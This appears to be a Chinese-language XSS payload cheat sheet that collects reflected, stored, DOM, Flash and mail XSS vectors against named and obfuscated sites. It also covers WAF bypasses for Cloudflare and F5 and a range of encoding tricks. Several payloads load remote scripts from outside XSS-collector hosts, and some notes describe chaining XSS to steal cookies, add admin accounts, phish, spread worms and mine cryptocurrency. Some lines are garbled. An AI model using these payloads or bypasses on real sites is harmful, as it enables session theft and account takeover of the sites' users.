XSS
html-xss-payload
medium/bugbountywriteup/a-html-injection-worth-600-dollars-5f065be0ab49
dom-xsshtml富文本框
github/filedescriptor/untrusted-types
utube/watch?v=Y1S5s3FmFsI
存储型XSS Cloudflare WAF旁路(2020年6⽉)
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
F5 Big-IP Advanced WAF XSS旁路(2020年5⽉)
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
储存型 - Payload - 2020/05/17
javas cript:alert(1)
x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL'; #图⽚链接处
分类
反射型存储型 DOM型 XSF(Flash XSS) PDFXSS MHTML协议跨站(MHTML,data) 字符编码(UTF-7 XSS)
富⽂本编辑器测试 - 输⼊框
<img SRC="www.baidu/" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="111" /> #style过滤不⾜ IE6环境
<img src=1 alt="hello,xss"onerror=alert(1);//"> #发表⽇志处
反射型
(1)<script>alert(1)</script>
(2)%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E
(3)">%3Cscript%3Ealert%kie/%29%3C/script%3E
(4)%3Cscript%3Ealert%28%27s%27%29;%3C/script%3E
(5)</SCRIPT><SCRIPT>alert("B0mbErM@n");</SCRIPT>
(6)--"><SCRIPT>alert("B0mbErM@n");</SCRIPT> -- 接路径后
(7)xx.xx/front/register.jsp?lang="onerror=kie)%20"
存储型
</a>javascript:alert(/x/) #如相册名称填写处
<iframe/src=javascript:kie);> #如上传视频后填写视频信息,在视频简介处插⼊
XSS -> 得到⽤户Cookie -》登录⽹站后台 -》通过越权漏洞添加管理员账号
测试浏览器: IE8 | IE9和Opera 关闭XSS filter | firefox 17.0.5
dom xss
⽆回显XSS - burp - Collaborator
<script src="collaborator⽣成的随机url"></script>
XSS:
movie.x/type,area/a"><BODY ONLOAD=alert(188)>,1/
movie.x/type,area/a%22%3E%3CBODY%20ONLOAD=alert%28188%29%3E,1/
t.x/pub/tags/"><script>alert(1)</script>
t.x/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E
t.x/tag/');alert(1)<!--
123.x/dianping/?aaaaaaaaaa"><script>alert(/wooyun/)</script>
t.x/p/worldcup?g=1"><script>alert(document.domain)</script>
shaft.jebe.x/show?a=a<script>alert(1)</script>&r=&type=single
help.x/mutually_help_null.shtml?query=<script>alert(1)</script>
www.x/Product/SearchNew.aspx?new=1&k=aaa<script>alert('xss')</script>
t.x/p/city?s=44&c=3"><script>alert(1)</script><"
search.x/bk.jsp?title="><script>alert(1)</script><"
wap.x/sogou/go2map/?pg=GMINDEX&position="><script>alert(1)</script><"
**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
product.x/simp_search.php?manuid=0&keyword=</script><script>alert(42)</script>&bgcolor=ffffff
play.x/list.php?keyword=<script>alert('xss');</script>&keywords=title&x=10&y=10
login.x/hd/signin.php?act=1&reference='"><script>alert("xss");</script><"&entry=sso®_entry=space
www.x/websnapshot?url='"><script>alert("我⼜来了—⼩⿊");</script><"&did=093e5e25b67f3688-24a8d6236dd
passport.x/matrix/getMyCardAction.do?url='"><script>alert(9122430);</script><"&chenmi=0&macval=&hmac=
mail.x/?userid=&appid='"><script>alert(15551700);</script><"&ru=
toolbox.x/searchcode/iframe?style=4&domain='"><script>alert(15551700);</script><"
www.x/pharmacysystem.php?page="><script>alert(15551700);</script>&Proceed_=1
v/astd_register.php?preurl=game.pps.tv/astd_register.php&cf="><script>alert(15551700);</script>
movies.x/movie_search.php?type=xss';"<script>alert(188)</script>&keyword=1
movies.x/movie_search.php?type=xss%27;%22%3Cscript%3Ealert%28188%29%3C/script%3E&keyword=1
movies.x/movie_search.php?type=search&keyword=</title><script>alert(/anyunix/)</script>
movies.x/movie_search.php?type=search&keyword=%3C/title%3E%3Cscript%3Ealert%28/anyunix/%29%3C/script%3E
passport.x/web/updateInfo.action?modifyType=';alert(/aa/);a='
passport.x/web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27
www.x/rp/uiserver2.asp?action=<script>alert(/xss/)</script>
cang.x/do/add?it=&iu=!--></script><script>alert(/xss/)</script>
cang.x/do/add?it=&iu=<script>alert(/xss/);</script>
**.**.**.**/diannao/?类型=&query=<script>alert(/xss/);</script>&cater=diannao
x.tv/cookie.php?act=login_tmp&success_callback="><div%20style="xss:expression(window.x?0:
(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)),window.x=1));"></div>
x/api/get_from_data.php?sid=48302&jsoncallback=jsonp1282643851243'<script>alert('s')</script>s&_=1282643881152
iu/index.php?do=Phone.List&fid=1&t=8<script>alert('s');</script>
x.sina/list.php?client=13&clientname=<script>alert('s');</script>
bj.x/bjhcg/stock/friendkchz.asp?tp=10&group="></iframe><script>alert(/XSS/);</script>
hk.x/gtja_Report/Report/Search.aspx?type="></iframe><script>alert(/XSS/);</script>
hksrv1.x/kf.php?keyword=&arg=gtjahk&style=1\0\"\'><ScRiPt>alert(/XSS/);</ScRiPt>
hk2.x/english/gtja_Report/Report/MarketCVList.aspx?type=0&key="
8.show.x/room/space.php?sid=1000040123&tab=2';</script><script>alert('by pandora ');</script><script>
passport.x/fastreg/regs1.jsp?style=black"></iframe><script>alert("pow78781");</script>
cgi.video.x/v1/user/userinfo?u=611991217;alert(/ss/)
t.x/session?username="><script>alert("xss")</script>\&password=xss&savelogin=1234
v.x/result.html?word=asdf<img src=1 onerror=alert(1)>&submit=百度⼀下&type=0
b2b.x/search/search.jsp?shangji=3&query=<script>kie)</script>
login.x/sso/login.php?callback=alert(String.fromCharCode(120,115,115,101,114));//&returntype=IFRAME
t.x/ajaxlogin.php?framelogin=1&callback=var aa='&retcode=101';alert('xsser');var bb='({&reason=';<!--
sms.x/GGBJ/login.php?phone=sefrefwe" /><script>alert(/ss/);</script><!--
tuan.x/beijing/life/?promoteid='"><script>alert(565902);</script><"
chat.x/robot/repositoryBrowse.jsp?title=</TITLE><body onload=alert(999)>
cp.x/login.asp?language='"><script>alert(7001645);</script><"
hi.x/?origURL='"><script>alert(123);</script><"&loginregFrom=index&ss=10101
auth.x/login/index.htm?support=&CtrlVersion=&loginScene=&personalLoginError=&goto='"><script>alert(7263974);</script><"&password=&REMOTE_PCID_NAME=_seaside_gogo_pcid&_seaside_gogo_pcid=&_seaside_gogo_=&_s v/astd_register.php?preurl=game.pps.tv/astd_register.php&cf="><script>alert(9631676);</script>
reg.x/xn6205.do?ss=a&rt=a&g=');location='baidu';//
富⽂本框上传图⽚处,抓包,POST请求:
msg=分享图⽚&act=insertTwitter&pic=up2.upload.x/"abc/123/onerror=alert(); xxx.png
msg=%u5206%u4EAB%u56FE%u7247&act=insertTwitter&pic=up2.upload.x/"abc/123/onerror=alert(); xxx.png
富⽂本 - 以源码⽅式编辑提交 STYLE标签未过滤 - IE6,7,8
<img SRC="www.x/" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="111" />
富⽂本编辑发表处:
<img src=1 alt="hello,xss"onerror=alert(1);//">
⽂本框:
<script>alert(/1/)</script>
<script>alert(/xss/)</script>
<script>alert("XSS")</script>
</style><script>alert(/xss/)</script>
<script>alert(1)</script>
"><script>alert(/a/);</script>
<script>kie)</script> --如在帖⼦签名处插⼊-》论坛发帖-》弹窗
</script><script>alert(1)</script>
WooYun<img src='' onerror=alert(/poc/)>
'"><script>alert(111);</script><"
<img src="x" onerror="alert(1)">
anyunix"/></div></div></div><BODY ONLOAD=alert('anyunix')>
"><script>alert(1)</script><" --贴吧发帖回帖标题处
>><<script>alert(/xss/)</script><
新建相册专辑,名称及描述处输⼊"><script>alert(1)</script><" -> 以后编辑该相册时触发
--⽂章标题处
<script>alert('s')</script>
<script>alert(/xss/)</script>
'"><script>alert("url");</script><" --插⼊链接⽂本框
anyunix</textarea></div></div><BODY ONLOAD=alert('anyunix')></textarea> --签名处
个⼈空间的“修改样式”功能,只是在保存前做了js判断,并没有对实质内容进⾏过滤,导致持久型xss。(expression(alert(1)) 在IE6,IE8下测试通过,此处有字数限制)
'"><script>alert("pow78781");</script> ---注册时⽤户名处
"><script src="www.***/test.js" type="text/javascript"></script>
可在个⼈博客⾸页执⾏js代码
详细说明:
使⽤⾃定义模板时插⼊javascript,未进⾏任何检查过滤。直接location.href转向即可将访问者博客(登录状态时)的博⽂、评论等隐藏
漏洞证明:
编辑⾃定义代码,如head区域,插⼊
<script>www.x/user/service.php?op=poststatus&blogid=***&id=***&Status=0</script>
个⼈空间DIY时可以使⽤expression,IE6、IE7测试通过
全⾓字符形式expression表达式未被过滤。⽽全⾓字符形式的expression能够被IE6解析并执⾏,因此,该漏洞可能导致使⽤IE 6.0访问sohu邮箱的⽤户遭受XSS攻击,如在邮箱处插⼊⽂本:
<DIV STYLE="width: expression(alert('XSS'));">
邮箱 - 发件⼈姓名
填写</script><script>alert()</script>
邮箱 - 发件箱邮件正⽂ - Style标签未过滤:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
邮件正⽂:
<div >xsser</div>
1.⽤QQ邮箱A给QQ邮箱B发邮件,收件⼈,标题填好后,对邮件正⽂内容做⼀次这样的操作:⽤邮件编辑器⾃带的插⼊图⽚功能,插⼊⼀个“⽹络照⽚”(地址随便写,asdf也没关系),之后在编辑器中该“插⼊的图⽚”的后⾯,输⼊任意html代码即可,
2.B收到邮件意图回复该邮件,点击回复时出现弹框
图⽚上传处:
<img src="javascript:alert(/xxxs/)"> --仅影响IE6
图⽚名称(利⽤js进⾏CSRF):
<script src=1.js></script>
<script src=***/*.js>
在图⽚中插⼊JS -》上传 - 》显⽰:
<img src="" onerror="XSS" />
在附件中插⼊JS -》上传 -》显⽰:
<style> body{ width:expression(alert(/xss/)) } </style>
搜索处:
<script>alert(/xxx/)</script>
"><script>alert()</script>
"><script>alert(/新浪⼿机跨站/)</script><
"><iframe src=www.baidu></iframe>
'"><script>alert("⼩⿊来跨站");</script><"
<iframe src=www.baidu </iframe>
<iframe src=www.baidu width=500 height=90></iframe>
aa</title></head><script>alert('乖乖');</script>
" onFocus="alert('⼗九楼跨站')
外部导⼊:
css导⼊:
@import url(**.**.**.**/1.css); 包含远程css⽂件,可以在1.css中写⼊XSS利⽤.
$str = preg_replace($filter, '', $str); //过滤是过滤了,但只⽤于判断,没对源输⼊起作⽤
if(preg_match("/(expression|implode|javascript)/i", $str)) { //并没有对import、http等进⾏检测
code 区域
/(expression|vbscript|javascript|import)/i IE6,IE7,IE8通过.
js⽂件导⼊:
/classic/rdMail.php?cb=1,</script><script src="XX/s.js"></script><script>
t.x/ajaxlogin.php?framelogin=1&callback=document.all[3].src='xss/xss.js';</script><!--
123.x/dianping/?"><SCRIPT/*/SRC='/xss.js'>
页⾯跳转触发:
服务器端存在对参数的过滤不严,导致可以通过在参数中提交带有JavaScript代码恶意url,在进⾏页⾯跳转时(如从搜索页⾯进⼊换肤)触发漏洞
www.x/search?q=beyond&"><script>alert('ok')</script>
漏洞触发
code 区域
www.x/skinchooser?back_url=www.x/search?q=beyond&"><script>alert('ok')</script>
Flash XSS
swf:
</script><!--><meta http-equiv="refresh" content="3;url=le.hk"><!--www.1.s
wf-->.swf (链接地址栏中输⼊)
链接地址:
mp3链接(链接地址栏中输⼊):
gHK【DBA】--><script language="javascript" type="text/javascript" src="js.users.51.la/4209140.js"></script><!--跨站.mp3
url链接地址栏中导⼊js⽂件:
'<!--><script language="javascript" type="text/javascript" src="js.users.51.la/4209140.js"></script><!--
绕过长度限制:
(1)Post提交表单:
</title><script>alert(/1/)</script>
绕过' " 等字符实现跳转 -》会⾃动转到 www.hao123
/v1/user/userinfo?u=611991217;var str=window.location.href;var es=/url=/;es.exec(str);var right=RegExp.rightContext;window.location.href=right&url=www.hao123
作⽤:
(1)实现⽹页⾃动跳转刷新
h.x/download/search.php?f_name=0;URL=visioncn/news" http-equiv="refresh" \\\
(2)获取敏感数据
XSS与邮箱同域,在邮件中诱使⽤户点击可获取邮件列表、通讯录等
(3)post发送Ajax修改个⼈资料,如修改邮箱为可操作的邮箱,然后密码回账号盗号
(4)获取管理员账号(管理员后台查看JS脚本)
(5)钓鱼
(6)蠕⾍
条件:1.同域2.登录状态
防御:
PHP:
htmlspecialchars
常⽤构造⽅法整理
<sCript>alert(1)</scRipt> #使⽤的正则不完善或者是没有⽤⼤⼩写转换函数
<script>alert(/xss/)</script> #多⽤于地址栏
%253Cimg%2520src%253D1%2520onerror%253Dalert%25281%2529%253E #多重url编码绕过
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script> #字符转ascii(unicode)⼗进制编码绕过
<scr<script>rip>alalertert</scr</script>rip> #拼凑法(利⽤waf的不完整性,只验证⼀次字符串或者过滤的字符串并不完整)
"onmousemove="alert('xss')
</textarea><script>alert('xss')</script>
<img scr=1 onerror=alert('xss')> #当不到图⽚名为1的⽂件时,执⾏alert('xss')
<a href=javascrip:alert('xss')>s</a> #点击s时运⾏alert('xss')
<iframe src=javascript:alert('xss');height=0 width=0 /></iframe> #利⽤iframe的scr来弹窗
"><script>onclick=alert(1)</script>
<a href="#" onclick="alert(1)">s</a>
<script>eval(location.hash.substr(1))</script>#alert('xss')
<p>Sanitizing <img src=""INVALID-IMAGE" onerror='location.href="too.much.spam/"'>!</p>
"<svg/onload=confirm(document.domain)>
a"><svg/onload=prompt(1)>
"></iframe><script>alert('OPEN BUG BOUNTY');</script>
<button onfocus=alert(/xss/) autofocus> #需要点击button才能执⾏
<img src=x onerror=window.alert(1) >
<img src=x onerror=window[‘al’%2B’ert’](1) >
<img src=x onerror=_=alert,_(/xss/) >
<img src=x onerror=_=alert;_(/xss/) >
<img src=x onerror=_=alert;x=1;_(/xss/) >
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))>
<sCrIpt srC=xss.tf/eeW></sCRipT>
"<body/onload=document.write(String.fromCharCode(60,115,67,114,73,112,116,32,115,114,67,61,104,116,116,112,58,47,47,120,115,115,46,116,102,
47,101,101,87,62,60,47,115,67,82,105,112,84,62))>" #对地址进⾏ascii编码,IE不⽀持String.fromCharCode
<img src=x onerror=javascript:'.concat('alert(1)> #IE、XSS Auditor均⽆法绕过
javascript://%250Aalert(1) #重定向+服务端对url两次解码(对url验证:PHP的filter_var或filter_input函数的FILTER_VALIDATE_URL)
javascript://%0Aalert(1) #重定向+服务端对url解码(对url验证:PHP的filter_var或filter_input函数的FILTER_VALIDATE_URL)
javascript://%0A1?alert(1):0 #三⽬运算符
javascript://baidu/%0A1?alert(1):0 #三⽬运算符
12345678901<svg onload=alert(1)> #字符长度固定-》构造伪造字符
<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript> #ascii⼋进制编码绕过
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> #字符转ascii⼗六进制编码绕过
<svg onload=javascript:alert(1) xmlns="st">
<iframe src="java script:alert(1)" height=0 width=0 /><iframe> #webkit过滤规则绕过
<script>alert('xss')</script>
" onclick="alert('xss')
<script src="xss8.pw/bgFfBx?1419229565"></script> (加载js⽂件)<script>confirm(/v587/)</script>
'"()&%<acx><ScRiPt>alert(/xss/)</ScRiPt>
'";alert(1);//
'";alert(/xsss/)//
zaq'onmouseover=prompt(1)>
<svg/onload=alert(1)>
/index.jsp?vendor_id=";alert(/xss/)<!--
字段绕过⽅法整理
1" autofocus onfocus=alert(1) x=" #尖括号绕过/input标签中
name=javascript:alert(1) autofocus onfocus=location=this.name #尖括号绕过/input标签中
location=url编码模式可将括号写为%28 %29 #()绕过
this.name传值绕过 #单引号'绕过
<SCRIPT>a=/1/alert(a.source)</SCRIPT> #单引号、双引号、分号绕过|尖括号、等号没法绕过
<script>{onerror=alert}throw1</script> #引号、分号绕过
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script> #单引号、双引号、分号绕过|尖括号没法绕过
<<SCRIPT>a=/1/alert(a.source)//<</SCRIPT> #<script>、单双引号、分号绕过|等号没法绕过
<a href="javascript:alert('xss')">link</a> #javascript绕过
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> #alert绕过
可绕过IE浏览器检测,⽆法绕过XSS Auditor检测构造⽅法整理
<img src=1 onerror=alert(document.domain)>
<video src=1 onerror=alert(/xss/)>
<audio src=x onerror=alert(/xss/)>
<body/onfocus=alert(/xss/)>
<input autofocus onfocus=alert(1)> #需点击触发
<svg onload=location=alert(1)>
<svg onload=javascript:alert(1)>
<button onfocus=prompt(1) autofocus> #需点击触发
<select autofocus onfocus=prompt(1)> #需点击触发
"<svg/onload=alert(1)>"@x.y 针对邮件地址检测构造XSS(if(!filter_var($email, FILTER_VALIDATE_EMAIL)))
<script>alert('xss')</script><svg/onload=setTimeout(alert(1))><img src=1 structor(alert(1))>
<img src=1 onerror=[1].map(alert)>
<img src=1 onerror=[1].filter(alert)>
<img src=1 onerror=alert(document.domain)>
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114> #对<script>alert(1)</script>ascii编码
<body/onfocus=_=alert,_(123)>
利⽤details | ⽬前只有 Chrome, Safari 6+, 和 Opera 15+ 浏览器⽀持 | chrome Auditor⽆法绕过" | eval拦截可对alert(1) ⼋进制编码
<details open ontoggle=top.alert(1)>
<details open ontoggle=top['alert'](1)>
<details open ontoggle=top[‘prompt’](1)>
<details open ontoggle=top[‘al’%2b’ert’](1)>
<details open ontoggle=top.eval(‘ale’%2B’rt(1)’) >
<details open ontoggle=top.eval(‘ale’%2B’rt(1)’) >
<details open ontoggle=eval(‘alert(1)’) >
<details open ontoggle=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029') >
<details open ontoggle=eval(atob(‘YWxlcnQoMSk=’)) >
<details open ontoggle=\u0065val(atob(‘YWxlcnQoMSk=’)) >
<details open ontoggle=%65%76%61%6c(atob(‘YWxlcnQoMSk=’)) > "
<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >
<details open ontoggle=eval(‘\141\154\145\162\164\50\61\51’) >
<details open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) >
#外部url,运⽤基于DOM的⽅法创建和插⼊节点把外部JS⽂件注⼊到⽹页并进⾏url编码
<details open ontoggle=eval(“appendChild(createElement(‘script’)).src=’xss.tf/eeW'”)>
<details open ontoggle=eval(%61%70%70%65%6e%64%43%68%69%6c%64%28%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74
绕过检测规则/waf⽅法整理
客户端绕过 - waf部署在客户端上,利⽤burp、fiddler绕过
USER-Agent伪造绕过 - 对百度、google、soso、360等爬⾍请求不过滤的情况下
cookie构造绕过 - $_REQUEST接受get post cookie,waf过滤GET POST
IP代理绕过 - ⽹站显⽰IP或浏览器,可对IP、user-agent进⾏构造,在PHP⾥X_FORWARDED_FOR和HTTP_CLIENT_IP两个获取IP的函数可被修改
插件绕过 - 过任意waf/⽀持跨域
编码绕过 - HTML、Unicode、URL、ASCII、JS编码、base64
字符实体绕过
利⽤webkit过滤规则绕过
参数污染绕过(主要⽤于搜索引擎)
127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos
注释符绕过
input1#value: "><!--
input2#value: --><script>alert(/xss/);<script/>
外部引⼊css脚本绕过
结合服务器编码语⾔绕过
配合代码逻辑绕过
编码语⾔漏洞/框架漏洞 - 如 Jquery 中 html()⽅法 - Apache||Nginx访问⽇志攻击 a/test/?text=<script>alert(1)</script> #Nginx,后端Apache
外部引⼊css脚本整理
<!DOCTYPE HTML>
<html>
<head>
<style>
@import url("malicious.css");
</style>
<title>TEST</title>
<meta charset="utf-8">
</head>
<body >
There is a will!
</body>
</html>
body{
color:expression(alert('xss'));
}
View Code
移动端构造⽅法整理
#ontouch*handlers
<body ontouchstart=alert(45)>
<body ontouchend=alert(45)>
<body ontouchmove=alert(45)>
Cookie绕过整理
Cookie中添加
style: wrewrwrwrwrafas"><script>alert(1)</script><!--
配合代码逻辑绕过整理
');%0a}%0d}%09alert();/*anything here*/if(true){//anything here%0a(' ');}}alert();if(true){('
场景
function example(age, subscription){
if (subscription){
if (age > 18){
another_function('');}}alert();if(true){('');
}
else{
console.log('Requirements not met.');
}
}
执⾏ -》
function example(age, subscription){
if (subscription){
if (age > 18){
another_function('');
}
}
alert();
if (true){
('');
}
else{
console.log('Requirements not met.');
⼯具篇
XSpear
利⽤篇
插⼊恶意代码 - ⼯具 - 桂林⽼兵cookie欺骗
<img src=x onerror=appendChild(createElement('script')).src='js_url' />
第三⽅劫持 (外调J/C)
XSS downloader
XCS
页⾯渲染XSS
挖矿
DDOS攻击
内⽹IP端⼝存活主机信息获取
截屏
获取后台地址
挂马
waf
"
<
(
发表评论